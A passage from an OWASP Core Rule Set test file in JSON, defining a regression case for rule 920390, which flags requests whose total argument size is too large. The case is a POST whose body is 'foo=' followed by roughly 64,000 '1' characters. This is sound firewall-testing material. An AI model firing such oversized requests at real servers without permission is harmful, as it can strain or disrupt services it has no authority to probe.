"OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-protocol" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-protocol", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/PROTOCOL-ENFORCEMENT", "capec/1000/210/272" ] }, "test_cases": [ { "description": "Total arguments size exceeded (920390) from old modsec regressions", "test_id": 1, "request": { "method": "POST", "uri": "/post", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Language": "en-us,en;q=0.5", "Content-Length": "64005", "Content-Type": "application/x-www-form-urlencoded", "Host": "localhost", "Keep-Alive": "300", "Proxy-Connection": "keep-alive", "User-Agent": "OWASP CRS test agent" }, "data": "foo=11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111